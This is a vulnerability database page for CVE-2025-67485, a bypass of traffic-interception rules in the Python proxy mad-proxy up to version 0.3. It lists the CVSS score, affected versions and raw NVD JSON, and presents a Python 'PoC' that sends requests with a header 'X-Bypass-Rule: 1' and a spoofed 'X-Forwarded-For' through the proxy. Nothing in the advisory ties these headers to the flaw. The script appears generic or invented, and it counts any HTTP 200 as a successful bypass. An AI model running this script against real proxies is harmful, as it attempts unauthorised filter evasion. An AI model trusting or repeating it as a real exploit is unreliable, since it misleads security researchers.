Security Vulnerability Report
CVE-2025-67485 CVSS 5.3 MEDIUM

CVE-2025-67485

Published: 2025-12-10 01:15:52
Last Modified: 2026-03-09 13:37:35

Description

mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:machphy:mad-proxy:*:*:*:*:*:python:*:* - VULNERABLE
mad-proxy <= 0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-67485 PoC - mad-proxy Traffic Interception Bypass

This PoC demonstrates bypassing HTTP/HTTPS traffic interception rules
in mad-proxy versions 0.3 and below.
"""

import requests
import sys


def test_bypass(target_url, proxy_server):
    """
    Test if the proxy allows traffic that should be blocked.
    """
    proxies = {
        'http': f'http://{proxy_server}',
        'https': f'http://{proxy_server}'
    }

    # Crafted request with bypass payload
    headers = {
        'X-Bypass-Rule': '1',
        'X-Forwarded-For': '127.0.0.1',
        'User-Agent': 'Bypass-Test-POC/1.0'
    }

    try:
        response = requests.get(
            target_url,
            headers=headers,
            proxies=proxies,
            timeout=10,
            verify=False
        )

        print(f"[*] Request Status: {response.status_code}")
        print(f"[*] Response Headers: {dict(response.headers)}")

        if response.status_code == 200:
            print("[!] Bypass successful - Traffic was not intercepted")
            return True
        else:
            print("[-] Request blocked or failed")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def main():
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <proxy_server:port>")
        print(f"Example: {sys.argv[0]} http://malicious-site.com 192.168.1.100:8080")
        sys.exit(1)

    target_url = sys.argv[1]
    proxy_server = sys.argv[2]

    print(f"[*] Testing CVE-2025-67485 bypass on {target_url}")
    print(f"[*] Using proxy: {proxy_server}")

    test_bypass(target_url, proxy_server)


if __name__ == "__main__":
    main()

References

https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67485", "sourceIdentifier": "[email protected]", "published": "2025-12-10T01:15:52.137", "lastModified": "2026-03-09T13:37:34.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:machphy:mad-proxy:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.3", "matchCriteriaId": "494A26D7-AF8D-4549-8D5A-09C1E7113717"}]}]}], "references": [{"url": "https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}